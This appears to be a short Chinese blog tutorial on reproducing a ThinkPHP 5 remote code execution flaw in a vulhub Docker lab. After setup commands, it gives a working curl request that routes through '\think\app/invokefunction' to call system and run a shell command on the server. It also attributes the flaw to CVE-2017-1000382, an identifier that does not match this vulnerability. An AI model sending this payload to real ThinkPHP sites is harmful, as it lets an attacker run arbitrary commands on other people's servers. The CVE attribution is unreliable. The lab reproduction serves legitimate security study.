thinkphp漏洞复现
由于ThinkPHP存在多个不同版本,不同版本的漏洞复现方法也不尽相同。以下是一个ThinkPHP远程代码执行漏洞(CVE-2017-1000382)的复现示例:
首先,确保你的环境中安装了Docker和Docker Compose。
接着,可以使用以下步骤复现漏洞:
- 克隆漏洞环境的GitHub仓库:
git clone https://github.com/vulhub/vulhub.git
- 进入ThinkPHP漏洞环境目录:
cd vulhub/thinkphp/thinkphp5_rce
- 使用Docker Compose启动环境:
docker-compose build
docker-compose up -d
- 漏洞复现,使用curl或者其他工具发送HTTP请求:
curl -X POST -d "who=123" 'http://your-ip:8080/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id'
替换your-ip
为你的实际IP地址或域名,然后你将会在终端看到id
命令的输出。
注意:在实际环境中,请确保你的操作遵循所有适用的法律法规,不进行破坏行为。此外,漏洞复现仅用于学习和测试,不得用于非法目的。
评论已关闭